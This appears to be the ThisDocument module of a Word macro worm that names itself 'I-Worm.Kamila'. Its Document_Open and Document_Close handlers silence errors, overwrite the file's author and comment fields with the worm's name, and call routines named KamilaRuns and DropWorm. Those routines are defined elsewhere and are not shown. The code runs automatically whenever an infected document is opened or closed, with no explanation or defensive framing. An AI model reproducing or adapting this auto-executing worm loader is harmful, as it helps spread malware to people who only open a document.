VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub Document_Open()
    On Error Resume Next
    If ThisDocument.Type = wdTypeDocument And Kamila.KamExTemp Then Exit Sub
    If ThisDocument.Type = wdTypeTemplate And Kamila.KamExDoc Then Exit Sub
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "I-Worm.Kamila"
        .Subject = "I-Worm.Kamila"
        .Comments = "Generated by I-Worm.Kamila"
        .Execute
    End With
    Kamila.KamilaRuns
    Kamila.DropWorm
End Sub

Private Sub Document_Close()
    Document_Open
End Sub
